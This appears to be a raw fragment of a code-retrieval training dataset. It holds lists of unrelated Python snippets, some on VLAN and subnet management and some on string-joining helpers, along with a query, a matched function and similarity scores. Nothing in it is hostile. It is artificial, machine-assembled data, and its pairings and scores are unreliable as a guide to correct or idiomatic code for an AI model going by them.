"def cap_net_vlan_provisioning_ind(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"cap_net_vlan_provisioning_ind\"), kwargs)",
"def set_vlan_interface(self, interface, vlan, vdc=None):\n\n assert isinstance(vlan, str)\n assert isinstance(interface, str)\n assert isinstance(vdc, list)\n\n self.logger.debug(\"Adding vlan {} on interface {} on {}\".format(vlan, interface, self.host))\n interface = interface.title()\n vlan_created = None\n\n if len(vdc) != 1:\n raise ValueError(\"Interface {} cannot exist in multiple vdcs {}\".format(interface, self.host))\n vdc = vdc[0]\n if not self.vdcs[vdc].check_interface(interface):\n raise ValueError(\n \"Interface {} does not exist in vdc {} on {}\".format(interface, vdc, self.host))\n if not self.vdcs[vdc].check_vlan(vlan):\n self.set_vlan(vlan)\n vlan_created = [vlan]\n\n self.switchto_vdc(vdc)\n\n commands = ['config t ; interface {}'.format(interface)]\n configured = False\n\n if not self.vdcs[vdc].check_interface_vlan(interface, vlan):\n if self.vdcs[vdc].interfaces[interface].switchport == 'access':\n commands.append('switchport access vlan {}'.format(vlan))\n elif self.vdcs[vdc].interfaces[interface].switchport == 'trunk':\n commands.append('switchport trunk allowed vlan add {}'.format(vlan))\n else:\n raise ValueError(\n \"Interface {} in vdc {} on {} is not access or trunk\".format(interface, self.current_vdc,\n self.host))\n else:\n configured = True\n\n if not configured:\n try:\n self._send_xml_cli(commands)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n stacktrace = traceback.extract_tb(exc_traceback)\n self.logger.error(\"VLAN {} configuration for interface {} on {} failed\".format(vlan, interface, self.host))\n self.logger.debug(sys.exc_info())\n self.logger.debug(stacktrace)\n else:\n self.get_interfaces(vdc=vdc)\n\n return vlan_created",
"def _is_vlan_router_interface_supported(self):",
"def purchase_vlan(self, vlan_name, debug=False):\n vlan_name = {'VLanName': vlan_name}\n json_scheme = self.gen_def_json_scheme('SetPurchaseVLan', vlan_name)\n json_obj = self.call_method_post(method=\"SetPurchaseVLan\", json_scheme=json_scheme)\n if debug is True:\n self.logger.debug(json_obj)\n if json_obj['Success'] is False:\n raise Exception(\"Cannot purchase new vlan.\")\n vlan = Vlan()\n vlan.name = json_obj['Value']['Name']\n vlan.resource_id = json_obj['Value']['ResourceId']\n vlan.vlan_code = json_obj['Value']['VlanCode']\n return vlan",
"def ms_get_management_vlan(self):\n self.open_route('/configure/switch_settings', \"Switch\")\n textarea_value = page_utils.get_input_var_value(\n self.get_page(),\n var_id='node_group_management_vlan')\n return textarea_value",
"def virtual_network(self):\n return self.broker.virtual_network(**{\"VirtualNetworkMemberID\": self.VirtualNetworkMemberID})",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def is_provider_vlan(vlan_id):\n session = db.get_session()\n if (session.query(network_models_v2.ProviderNetwork).\n filter_by(network_type=const.NETWORK_TYPE_VLAN,\n segmentation_id=vlan_id).first()):\n return True",
"def _support_vlan_router_interfaces(self):\n pass",
"def validate_vlan(vlan_id, meraki_net):\n check_vlan = False\n vlan_name = \"\"\n api_uri = f\"/v0/networks/{meraki_net}/vlans/{vlan_id}\"\n data = get_meraki_api_data(api_uri)\n if data:\n check_vlan = True\n vlan_name = data[\"name\"].strip()\n else:\n check_vlan = False\n return check_vlan, vlan_name",
"def read_port_vlan_info(self, port: int) -> Vlans:\n raise NotImplementedError",
"def system_vlan_num_in(self, system_vlan_num_in):\n\n self._system_vlan_num_in = system_vlan_num_in",
"def _get_tunnel_vif(self):\n return self.__tunnel_vif",
"def list_vlans(self, datacenter=None, vlan_number=None, name=None,\r\n **kwargs):\r\n _filter = NestedDict(kwargs.get('filter') or {})\r\n\r\n if vlan_number:\r\n _filter['networkVlans']['vlanNumber'] = query_filter(vlan_number)\r\n\r\n if name:\r\n _filter['networkVlans']['name'] = query_filter(name)\r\n\r\n if datacenter:\r\n _filter['networkVlans']['primaryRouter']['datacenter']['name'] = \\\r\n query_filter(datacenter)\r\n\r\n kwargs['filter'] = _filter.to_dict()\r\n\r\n if 'mask' not in kwargs:\r\n kwargs['mask'] = DEFAULT_VLAN_MASK\r\n\r\n return self.account.getNetworkVlans(**kwargs)",
"def virtual_router_ip(self):\n return self._virtual_router_ip",
"def get_vlans():\n query = {\"type\": \"op\", \"cmd\": \"<show><vlan>all</vlan></show>\"}\n\n return __proxy__[\"panos.call\"](query)",
"def vm_vlan_num_lt(self, vm_vlan_num_lt):\n\n self._vm_vlan_num_lt = vm_vlan_num_lt",
"def vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"vnet_name\")",
"def cap_voice_vlan_ind(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"cap_voice_vlan_ind\"), kwargs)",
"def lan_address(self):\n _, port = self._socket.getsockname()\n return (\"127.0.0.1\", port)",
"def _get_vlist(self, vlist):\n if vlist == \"all\":\n return list(range(1, 4095))\n elif vlist == \"none\":\n return []\n elif type(vlist) is not list:\n raise Exception(\"Unexpected vlan list: \" + str(vlist))\n else:\n return vlist",
"def subnet_id(self) -> str:\n return pulumi.get(self, \"subnet_id\")",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def VplsIdIpAddress(self):\n return self._get_attribute('vplsIdIpAddress')",
"def deploy_neutron_vlan(self):\n self.env.revert_snapshot(\"ready_with_3_slaves\")\n\n cluster_id = self.fuel_web.create_cluster(\n name=self.__class__.__name__,\n mode=DEPLOYMENT_MODE,\n settings={\n \"net_provider\": 'neutron',\n \"net_segment_type\": NEUTRON_SEGMENT['vlan'],\n 'tenant': 'simpleVlan',\n 'user': 'simpleVlan',\n 'password': 'simpleVlan'\n }\n )\n self.fuel_web.update_nodes(\n cluster_id,\n {\n 'slave-01': ['controller'],\n 'slave-02': ['compute'],\n 'slave-03': ['compute']\n }\n )\n self.fuel_web.deploy_cluster_wait(cluster_id)\n\n cluster = self.fuel_web.client.get_cluster(cluster_id)\n assert_equal(str(cluster['net_provider']), 'neutron')\n\n self.fuel_web.verify_network(cluster_id)\n\n self.fuel_web.run_ostf(\n cluster_id=cluster_id)\n\n self.env.make_snapshot(\"deploy_neutron_vlan\", is_make=True)",
"def subnet_id(self) -> Optional[str]:\n return pulumi.get(self, \"subnet_id\")",
"def get_virtual_network_id(self):\n\t\treturn call_sdk_function('PrlVmDevNet_GetVirtualNetworkId', self.handle)",
"def add_vlan(self, vlan_number, vlan_pool_name):\n class_query = ClassQuery('fvnsVlanInstP')\n class_query.propFilter = 'eq(fvnsVlanInstP.name, \"' + VLAN_POOL_PREFIX + vlan_pool_name + '\")'\n vp_list = self.moDir.query(class_query)\n # If the vlan pool does not exists, create it with the physical domain and the attachable entity profile\n if len(vp_list) == 0:\n VlanInstP_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + vlan_pool_name, 'static')\n DomP_mo = self.create_physical_domain(PD_PREFIX + vlan_pool_name, str(VlanInstP_mo.dn))\n self.create_attachable_entity_profile(AEP_PREFIX + vlan_pool_name, str(DomP_mo.dn))\n else:\n VlanInstP_mo = vp_list[0]\n encap_mo = EncapBlk(str(VlanInstP_mo.dn), VLAN_PREFIX + str(vlan_number),\n VLAN_PREFIX + str(vlan_number), allocMode='static')\n self.commit(encap_mo)",
"def vnet_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"vnet_name\")",
"def l3_isolation_domain_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def get_lane(self):\n return self.lane",
"def _get_l2vni(self):\n return self.__l2vni",
"def system_vlan_num_lt(self, system_vlan_num_lt):\n\n self._system_vlan_num_lt = system_vlan_num_lt",
"def _isVLAN(v):\n #if not v or not type(v) is (string): return 0\n v = v.replace(',','')\n v = v.replace('-','')\n for char in v:\n if re.compile('[0-9]+').match(char) == None:return 0\n return 1",
"def getlan():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('10.255.255.255', 1))\n lan = str(s.getsockname()[0])\n s.close()\n except socket.error:\n s.close()\n sys.exit('>> Unable to find LAN IP')\n\n return lan",
"def _create_vlan(self, conn, vlan_id, vlan_name):\n\n req_js = {}\n req_js['vlan_id'] = vlan_id\n req_js['vlan_name'] = vlan_name\n req_js['admin_state'] = 'up'\n\n resp = conn.post(self.VLAN_REST_OBJ, req_js)\n self._check_process_resp(resp)",
"def get_vol_lvl(self):\n global volume\n #output = subprocess.check_output(['amixer', 'sget', self.mixer_name]).decode('utf-8')\n return volume#int(output[(output.find('[') + 1):output.find('%]', (output.find('[') + 1))])",
"def virtual_network_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"virtual_network_id\")",
"def lun(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"lun\")",
"def vat_number(self):\n return self._vat_number",
"def get_network_id(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkId', self.handle)",
"def _get_ethernet_tag(self):\n return self.__ethernet_tag",
"def system_vlan_num(self, system_vlan_num):\n\n self._system_vlan_num = system_vlan_num",
"def l3_isolation_domain_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def vm_vlan_num(self, vm_vlan_num):\n\n self._vm_vlan_num = vm_vlan_num",
"def common_values(self):\n vlan = self.vlan\n return dict(\n addr4=vlan.addrs(4),\n addr6=vlan.addrs(6),\n addresses=vlan.addrs(),\n gateways=vlan.gateways_filtered(),\n iface=vlan.iname(),\n mac=vlan.mac,\n metric=vlan.metric,\n mtu=vlan.mtu,\n nets4=vlan.nets(4),\n nets6=vlan.nets(6),\n nets=vlan.nets(),\n vlan=vlan.name,\n )",
"def __init__(self, vlan_id):\n self.vlan_id = vlan_id\n self.action_type = 'set_vlan'",
"def vlan_create(handle, name, vlan_id, sharing=\"none\",\r\n mcast_policy_name=\"\", compression_type=\"included\",\r\n default_net=\"no\", pub_nw_name=\"\", parent_dn=\"fabric/lan\"):\r\n from ucsmsdk.mometa.fabric.FabricVlan import FabricVlan\r\n\r\n obj = handle.query_dn(parent_dn)\r\n if obj:\r\n vlan = FabricVlan(parent_mo_or_dn=obj,\r\n sharing=sharing,\r\n name=name,\r\n id=vlan_id,\r\n mcast_policy_name=mcast_policy_name,\r\n policy_owner=\"local\",\r\n default_net=default_net,\r\n pub_nw_name=pub_nw_name,\r\n compression_type=compression_type)\r\n\r\n handle.add_mo(vlan, modify_present=True)\r\n handle.commit()\r\n else:\r\n log.info(parent_dn + \" MO is not available\")",
"def subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_id\")",
"def subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_id\")",
"def _tenant_network(self):\n port = self._connection.network.ports.find_by_device_owner('network:router_interface')\n if port:\n return self._connection.network.networks.get(port.network_id)\n else:\n raise errors.ImproperlyConfiguredError('Could not find tenancy network')",
"def subnet_id(self):\n return self._subnet_id",
"def name(self):\n return 'VL53L1X'",
"def moc_vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"moc_vnet_name\")",
"def RouteDistinguisherIpAddress(self):\n return self._get_attribute('routeDistinguisherIpAddress')",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def create_vlan(module, switch, vlan_id, untagged_ports=None):\n global CHANGED_FLAG\n output = ''\n new_vlan = False\n\n cli = pn_cli(module)\n cli += ' vlan-show format id no-show-headers '\n existing_vlans = run_cli(module, cli)\n\n if existing_vlans is not None:\n existing_vlans = existing_vlans.split()\n if vlan_id not in existing_vlans:\n new_vlan = True\n\n if new_vlan or existing_vlans is None:\n cli = pn_cli(module)\n cli += ' vlan-create id %s scope fabric ' % vlan_id\n\n if untagged_ports is not None:\n cli += ' untagged-ports %s ' % untagged_ports\n\n run_cli(module, cli)\n CHANGED_FLAG.append(True)\n output += '%s: Created vlan with id %s\\n' % (switch, vlan_id)\n\n return output"
] | [
"0.7999924",
"0.7726699",
"0.7723152",
"0.74945563",
"0.6896781",
"0.68907255",
"0.66186804",
"0.6475853",
"0.6435667",
"0.64156556",
"0.6283416",
"0.62097275",
"0.62097275",
"0.62045115",
"0.579412",
"0.5772401",
"0.57347697",
"0.56815064",
"0.5577279",
"0.5575757",
"0.5513762",
"0.53874314",
"0.5357877",
"0.5307194",
"0.52880514",
"0.52356",
"0.52324003",
"0.52150667",
"0.5205583",
"0.5205424",
"0.5182322",
"0.5181402",
"0.5181402",
"0.5166206",
"0.51448596",
"0.5138239",
"0.5129257",
"0.5125093",
"0.51002944",
"0.5092885",
"0.5092885",
"0.5092885",
"0.5091799",
"0.50541705",
"0.5048843",
"0.5019748",
"0.49930835",
"0.49746278",
"0.4960606",
"0.49599355",
"0.495937",
"0.49576157",
"0.49480367",
"0.4940397",
"0.493007",
"0.4917736",
"0.49088886",
"0.4890636",
"0.48739162",
"0.4867709",
"0.4861594",
"0.48556358",
"0.4849366",
"0.48490348",
"0.48423594",
"0.48384184",
"0.48313564",
"0.48265526",
"0.48254472",
"0.4822892",
"0.4809546",
"0.4808165",
"0.48000398",
"0.47978896",
"0.47975978",
"0.47915488",
"0.47674677",
"0.47535634",
"0.47476095",
"0.47443464",
"0.4732304",
"0.47172344",
"0.47172084",
"0.4706235",
"0.46897304",
"0.46748835",
"0.46580702",
"0.4656013",
"0.46523625",
"0.46487445",
"0.46460047",
"0.46415251",
"0.46415251",
"0.46406233",
"0.46358407",
"0.4633533",
"0.46328533",
"0.46235913",
"0.4622502",
"0.458832"
] | 0.75627106 | 3 |
join the input string | def my_join(iters, string):
out = ""
for i in range(iters):
out += "," + string
return out | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def join(self, iterable) -> String:\n pass",
"def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += \", \" + string\n return out",
"def join_strings(words):\n joined_string = ''\n for word in words:\n joined_string += word\n\n return joined_string",
"def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += string.join(\", \")\n return out",
"def my_join(iters, string):\n out=''\n for i in range(iters):\n out += string.join(\", \")\n #add string together with , as seperator\n #repeat iters numbers of times\n return out",
"def robust_join(s, sep=','):\n return sep.join([str(e) for e in s])",
"def join(sep, xs):\n return str(sep).join(xs)",
"def join(self, tokens):\n if self.chars:\n joiner = ''\n else:\n joiner = ' '\n return joiner.join(tokens)",
"def _urljoin(self, *args):\r\n\t\treturn \"/\".join(map(lambda x: str(x).rstrip('/'), args))",
"def join_string(part1, part2, concatenation_string = 'AND', seperator=' '):\n\n if part1 == '':\n return part2\n\n elif part2 == '':\n return part1\n\n\n if part1[-1] == seperator:\n sep1 = ''\n else:\n sep1 = seperator\n\n\n if part2[0] == seperator:\n sep2 = ''\n else:\n sep2 = ' '\n\n\n return part1 + sep1 + concatenation_string + sep2 + part2",
"def ujoin(*args):\n if len(args) == 0 or len(args[0]) == 0:\n return ''\n return (\n (args[0][0] == '/') * '/' # prepend slash if first arg starts with it\n + '/'.join(x[(x[0] == '/') : (len(x) - (x[-1] == '/'))] for x in args)\n + (args[-1][-1] == '/') * '/'\n ) # append slash if last arg ends with it",
"def word_join(self, words):\n return \" \".join(words)",
"def urljoin(*args):\n\n return \"/\".join(map(lambda x: str(x).rstrip('/'), args))",
"def list_join(the_list):\n return ' '.join(the_list)",
"def rejoin(textList):\n return ','.join(textList)",
"def sentence_join(self, sentences):\n return \" \".join(sentences)",
"def join_link(s, separator):\n if s == empty:\n return \"\"\n elif rest(s) == empty:\n return str(first(s))\n else:\n return str(first(s)) + separator + join_link(rest(s), separator)\n # so much like the TLS programming style.",
"def urljoin(*args):\n return '/'.join(str(a or '').strip('/') for a in args)",
"def join(self, delimiter: str) -> str:\n return delimiter.join((str(x) for x in self.array))",
"def list_string(join_list):\n joined_list = '[{}]'.format(join_list, join_list)\n return joined_list",
"def join(sep, seq):\n return _to_bytes_or_str_array(\n _vec_string(sep, object_, 'join', (seq,)), seq)",
"def join_list(items: Iterable[str]) -> str:\n\n return ITEM_SEPARATOR.join(items)",
"def join(self, *parts):\n if parts:\n parts = list(parts)\n if len(parts) > 1:\n for i, p in enumerate(parts[:-1]):\n parts[i] = p.strip('/')\n parts[-1] = parts[-1].lstrip('/')\n return '/'.join(parts)",
"def jointext(firststring, secondstring):\n\n # Return the joined strings\n return str(firststring) + str(secondstring)",
"def join_link(s, separator):\n if s == empty:\n return\"\"\n elif rest(s) == empty:\n return str(first(s))\n else:\n return str(first(s)) + separator + join_link(rest(s), separator)",
"def join_link(s, separator):\n if s == empty:\n return \"\"\n elif rest(s) == empty:\n return str(first(s))\n else:\n return str(first(s)) + separator + join_link(rest(s), separator)",
"def join_link(s, separator):\n if s == empty:\n return ''\n elif rest(s) == empty:\n return str(first(s))\n else:\n return str(first(s)) + separator + join_link(rest(s), separator)",
"def join_strings_with_comma(words):\n joined_string = ', '.join(words)\n return joined_string",
"def join(self, iterable):\n result = ANSIString(\"\")\n last_item = None\n for item in iterable:\n if last_item is not None:\n result += self._raw_string\n if not isinstance(item, ANSIString):\n item = ANSIString(item)\n result += item\n last_item = item\n return result",
"def join_strings(self):\n\n self.__corpora = [' ' + ' '.join(strings) + ' ' for strings in self.__corpora]",
"def str_join(paths: []):\n return \"/\".join(paths)",
"def Join(sourcearray, delimeter=\" \"):\n s_list = list(map(str, sourcearray))\n return delimeter.join(s_list)",
"def join(self, sep):\n if self.is_a(str):\n return _(self._.join(sep))\n return _(sep.join(self._))",
"def join(*args, **kwargs):\n if args:\n print ', '.join([str(s) for s in args])\n if kwargs:\n sub_items = []\n for k, v in kwargs.items():\n sub_items.append(''.join([k, '=', v]))\n print ', '.join(sub_items)",
"def join(self):\n return \"\".join(self._digits)",
"def concat_text(text):\n textout = \" \".join(text)\n return textout",
"def _url_join(self, *parts):\n return \"/\".join(map(lambda fragment: fragment.rstrip('/'), parts))",
"def query_join(*query_list):\n return \"&\".join(query_list)",
"def concat_strings(l_strings):\n if l_strings == []:\n return \"\"\n else: \n return l_strings[0] + \" \" + concat_strings(l_strings[1:])",
"def implode(delim, items):\n return delim.join(items)",
"def join_url(*args): # type: (*str) -> str\n parts = [part[:-1] if part and part[-1] == '/' else part for part in args]\n parts.append('')\n return '/'.join(parts)",
"def join(*paths):\r\n path = \"\"\r\n for component in paths:\r\n path += (\"/\" if path and not path.endswith(\"/\") else \"\") + component.replace(\r\n \"\\\\\", \"/\"\r\n )\r\n return path",
"def _commandline_join(self, tokens):\r\n commands = filter(None, map(str, tokens))\r\n return self._command_delimiter.join(commands).strip()",
"def _commandline_join(self, tokens):\r\n commands = filter(None, map(str, tokens))\r\n return self._command_delimiter.join(commands).strip()",
"def _commandline_join(self, tokens):\r\n commands = filter(None, map(str, tokens))\r\n return self._command_delimiter.join(commands).strip()",
"def and_join(sequence):\n return ', '.join(sequence[:-1]) + ',' * (len(sequence) > 2) + ' and ' * (len(sequence) > 1) + sequence[-1]",
"def join(path, *paths: str) -> str:\n pass",
"def join_str_list(str_list):\n result = \"\"\n for s in str_list:\n if s.startswith(\"##\"):\n result += s[2:]\n else:\n result += \" \" + s\n return result",
"def concatenate_string(string1, stringy2):\n return string1 + \" \" + stringy2",
"def urljoin(*args):\n from six.moves.urllib.parse import urljoin as sys_urljoin\n from functools import reduce\n return reduce(sys_urljoin, args)",
"def list_to_string(inputlist):\n outstring = \"\"\n numusers = len(inputlist)\n if numusers == 1: # foo\n outstring += inputlist[0]\n if numusers == 2: # foo and bar\n outstring += (inputlist[0] + \" and \" + inputlist[1])\n if numusers >= 3: # foo, bar and baz\n for x in range(numusers-2):\n outstring += inputlist[x] + \", \"\n outstring += (inputlist[-2] + \" and \" + inputlist[-1])\n return outstring",
"def list_to_str(input_str):\r\n\r\n return \" \".join([str(val) for val in input_str])",
"def join_params(**params):\n\tparam_list = get_sorted_keys(params)\n\tvalues = []\n\tfor k in param_list:\n\t\tvalues.append(k+'-'+join_items(params[k]))\n\treturn \"_\".join(values)",
"def join_str(lst, new_line=False):\n if new_line:\n j_str = \"/n\".join([str(i) for i in lst])\n else:\n j_str = \"\".join([str(i) for i in lst])\n return j_str",
"def url_path_join(*fragments):\n fragments = fragments or (\"\",)\n result = fragments[0] # Tolerate an empty list\n for thing in fragments[1:]:\n result = result.rstrip(\"/\") + \"/\" + thing.lstrip(\"/\")\n return result",
"def __joinCmdStringWithExtras (self,cmdString,extras):\n if (extras != \"\"):\n self._log(\"joining-extras\").debug4(\"joining cmd '%s' with extra params '%s'\",cmdString,extras)\n cmdString += \" \" + extras\n return cmdString",
"def url_join(*parts):\n parts = parts or [\"\"]\n clean_parts = [part.strip(\"/\") for part in parts if part]\n if not parts[-1]:\n # Empty last element should add a trailing slash\n clean_parts.append(\"\")\n return \"/\".join(clean_parts)",
"def join_with_and(values, last_word: str = 'and') -> str:\n valuesList = list(values)\n length = len(valuesList)\n\n # value1, value2, value3 and value4\n if length > 2:\n return '{} {} {}'.format(', '.join(valuesList[:-1]), last_word, valuesList[-1])\n # value1 and value2\n elif length == 2:\n return '{} {} {}'.format(valuesList[0], last_word, valuesList[1])\n # value 1\n elif length == 1:\n return valuesList[0]\n # Empty\n return ''",
"def joined_parameter(*values: str) -> str:\n return \"+\".join(values)",
"def join(path, *paths):\n\n for p in paths:\n if p.startswith(\"/\"):\n path = p\n elif p != \"\":\n path += (\"\" if path == \"\" or path.endswith(\"/\") else \"/\") + p\n return path",
"def underscore_join(iterable):\n iterable_as_str = [str(x) for x in iterable]\n return \"__\".join(iterable_as_str)",
"def concat_with_separator(strings, starting_separator):\n s=[]\n for i in range(len(strings)):\n s+=strings[i]+[starting_separator+i]\n return s",
"def join_items(values, sort=False):\n\tif isinstance(values, str):\n\t\treturn clean_string(values)\n\n\ttry:\n\t\tval = []\n\t\tfor v in values:\n\t\t\tval.append(clean_string(v))\n\t\tif sort:\n\t\t\tval.sort()\n\t\treturn \"-\".join(val)\n\texcept TypeError:\n\t\treturn str(values)",
"def concatenate_string(stringy1, stringy2):\n\n return \"{} {}\".format(stringy1, stringy2)",
"def concat(*args, sep=\"/\"):\n return sep.join(args)",
"def concatena(*args):\n linea = ''\n for l in args:\n linea += str(l if l else '')\n return linea",
"def encode(self, strs):\n even = 0\n odd = 1\n rst = ''\n while even<len(strs) and odd<len(strs):\n rst += strs[odd]\n rst += ','\n rst += strs[even]\n odd += 2\n even +=2\n if even<len(strs):rst+=strs[even]\n elif odd<len(strs): rst+=strs[odd]\n return rst",
"def urljoin(*atoms):\n url = \"/\".join([x for x in atoms if x])\n while \"//\" in url:\n url = url.replace(\"//\", \"/\")\n # Special-case the final url of \"\", and return \"/\" instead.\n return url or \"/\"",
"def join_with_or(values) -> str:\n return join_with_and(values, 'or')",
"def shlex_join(split_command) -> str:\n return \" \".join(shlex.quote(str(arg)) for arg in split_command)",
"def __join_if_list(text_or_list: Union[List[str], str]) -> str:\n\n if isinstance(text_or_list, list):\n return ' '.join(text_or_list)\n return text_or_list",
"def merge(string: str, user_input: tuple) -> str:\n merged_string = string.format(*user_input)\n return merged_string",
"def join_list(jlist, joiner=', '):\n if len(jlist) == 0:\n jlist = '[]'\n else:\n jlist = joiner.join(jlist)\n return jlist",
"def testJoin(self):\r\n P=lambda p:ufsi.NativeUnixPath(p)\r\n data={\r\n # 1\r\n 'relativePath':\r\n ['/dir1/',P('dir2/fileBase.ext'),'/dir1/dir2/fileBase.ext'],\r\n\r\n # 2\r\n 'absolutePath':\r\n ['/dir1/',P('/dir2/fileBase.ext'),'/dir2/fileBase.ext'],\r\n\r\n # 3\r\n 'notSeparatorTerminatedPath':\r\n ['dir1',P('dir2/fileBase.ext'),'dir1/dir2/fileBase.ext'],\r\n\r\n # 4\r\n 'emptyPath':\r\n ['dir1',P(''),'dir1/'],\r\n\r\n # 5\r\n 'nonNativePath':\r\n ['dir1',ufsi.HttpPath('http://www.google.com.au/'),\r\n 'http://www.google.com.au/']\r\n }\r\n\r\n for k in data.iterkeys():\r\n p1=P(data[k][0])\r\n p2=data[k][1]\r\n r1=str(p1.join(p2))\r\n r2=data[k][2]\r\n self.assertEquals(r1,r2,\r\n '%s: join result was %r but should have been %r'\r\n %(k,r1,r2))",
"def urljoin(*parts):\n def _gen(parts):\n prev = None\n for part in parts:\n if not part:\n continue\n if not prev:\n prev = part\n elif (prev[-1] == '/') != (part[0] == '/'): # Exactly one slash was present\n prev = part\n # At this point, either zero or two slashes are present. Which is it?\n elif part[0] == '/': # Two slashes.\n prev = part[1:]\n else: # No slashes.\n yield '/'\n prev = part\n yield prev\n\n return \"\".join(part for part in _gen(parts))",
"def concatenate_items(items, conjunction='and'):\n text = ''\n if not items:\n text = ''\n elif len(items) == 1:\n text = items[0]\n elif len(items) == 2:\n text = '{} {} {}'.format(items[0], conjunction, items[1])\n else:\n text = ', '.join(items[:-1])\n text += ', {} {}'.format(conjunction, items[-1])\n return text",
"def stringer(list):\n\tstring = \"\"\n\tfor x in list:\n\t\tstring = string + str(x)\n\treturn string",
"def urljoin(cls, base, end):\n\n if base and not base.endswith('/'):\n base = base + '/'\n return urljoin(base, str(end))",
"def shlex_join(argv):\n def quote(arg):\n if arg.find(\" \") >= 0:\n return '\"%s\"' % arg\n else:\n return arg\n return \" \".join([quote(arg) for arg in argv])",
"def str(self) -> str:\n return \"\".join(self)",
"def join_list(\n object_list: list, delimiter: str = \", \", last_delimiter: str = \" & \"\n) -> str:\n if not object_list:\n return \"\"\n list_copy = list(object_list)\n last = list_copy.pop()\n if list_copy:\n return f\"{delimiter.join(list_copy)}{last_delimiter}{last}\"\n return f\"{last}\"",
"def join(self, texts, joiner=', '):\n\n return joiner.join((\n text for index, text in enumerate(texts)\n if text and text not in texts[index + 1:]\n ))",
"def urljoin(cls, base, end):\r\n if base and not base.endswith(\"/\"):\r\n base = base + \"/\"\r\n return urljoin(base, str(end))",
"def route_join(*args):\n route_url = \"/\".join([x.strip(\"/\") for x in args])\n if not route_url.startswith(\"/\"):\n route_url = \"/\" + route_url\n return route_url",
"def _join(lst, key, sep=\";\"):\n return sep.join([d[key] for d in lst if d[key]])",
"def implode(self, column, glue=''):\n return glue.join(self.lists(column))",
"def normalized_join(path1: str, *pathsN) -> str:\n return normalized_path(os.path.join(path1, *pathsN))",
"def join_date_strings(dates, separator=\"','\", df=\"%d-%m-%Y\"):\n return separator.join([x.strftime(df) for x in dates])",
"def str_cat(arg1, arg2):\n return str(arg1) + str(arg2)",
"def irchain_str(self):\n s = []\n if self.irlen_before:\n s.append('%d' % self.irlen_before)\n s.append('(%d)' % self.irlen)\n if self.irlen_after:\n s.append('%d' % self.irlen_after)\n return ','.join(s)",
"def path_join(first: str, second: str) -> str:\n first = first.rstrip('/\\\\')\n second = second.lstrip('/\\\\')\n if not first: return second\n if not second: return first\n return first + '/' + second",
"def _concat(self, *args, **kwargs):\n values = list(args)\n output = []\n for value in values:\n if not isinstance(value, (str, basestring)):\n value = unicode(value)\n else:\n value = unicode(value)\n value = value.strip()\n output.append(value)\n output = kwargs[\"delimiter\"].join(output)\n output = unicode(output)\n return output",
"def urljoin(base, *path, **query):\n if base and base.endswith('/'):\n base = base[:-1]\n retval = [base]\n\n # build the path\n path = '/'.join([''] + [quote(s, '') for s in path])\n if path:\n retval.append(path)\n\n # build the query string\n params = []\n for name, value in query.items():\n if type(value) in (list, tuple):\n params.extend([(name, i) for i in value if i is not None])\n elif value is not None:\n if value is True:\n value = 'true'\n elif value is False:\n value = 'false'\n params.append((name, value))\n if params:\n retval.extend(['?', urlencode(params)])\n\n return ''.join(retval)",
"def collapse(L):\n output = \"\"\n for s in L:\n output = output + s\n return output",
"def collapse(L):\n output = \"\"\n for s in L:\n output = output + s\n return output",
"def collapse(L):\n output = \"\"\n for s in L:\n output = output + s\n return output",
"def collapse(L):\n output = \"\"\n for s in L:\n output = output + s\n return output",
"def join(cls, *args):\n return AbsolutePath(os.path.join(*(str(piece) for piece in args)))",
"def join_path(values: t.List[str]) -> str:\n from axonius_api_client.tools import listify\n\n return \" => \".join(listify(values))",
"def concat_list(str_lst):\n concatenation = ''\n if len(str_lst) != 0:\n for string in str_lst:\n concatenation = concatenation + string\n return concatenation"
] | [
"0.73991024",
"0.732438",
"0.7231096",
"0.72088933",
"0.7069224",
"0.6920054",
"0.68781954",
"0.67399055",
"0.66996497",
"0.6629545",
"0.6618605",
"0.65867525",
"0.658431",
"0.6571246",
"0.653331",
"0.65244675",
"0.6523184",
"0.6489013",
"0.6483073",
"0.6398085",
"0.6364346",
"0.63627094",
"0.6359249",
"0.63512945",
"0.6350764",
"0.63500947",
"0.63371634",
"0.6315935",
"0.62794495",
"0.6273673",
"0.6269532",
"0.62361354",
"0.61873597",
"0.6146656",
"0.61364436",
"0.60992634",
"0.60929066",
"0.60897845",
"0.60533345",
"0.60423857",
"0.60247684",
"0.6020866",
"0.60157007",
"0.60157007",
"0.60157007",
"0.5999405",
"0.599927",
"0.5947259",
"0.59366506",
"0.5931084",
"0.59193313",
"0.5919187",
"0.5903051",
"0.5888612",
"0.5888465",
"0.5862411",
"0.58587533",
"0.58576983",
"0.58576524",
"0.5795488",
"0.5780179",
"0.5766938",
"0.5759968",
"0.5759488",
"0.5740611",
"0.572998",
"0.5723133",
"0.5720879",
"0.5716602",
"0.5698202",
"0.569399",
"0.56917727",
"0.56766355",
"0.56683147",
"0.56661326",
"0.56522155",
"0.56516755",
"0.56284744",
"0.56201625",
"0.56036997",
"0.5598421",
"0.55806017",
"0.5574956",
"0.5562334",
"0.55589324",
"0.555222",
"0.5552216",
"0.5517076",
"0.55086505",
"0.5498616",
"0.548909",
"0.5482196",
"0.547685",
"0.5452624",
"0.5452624",
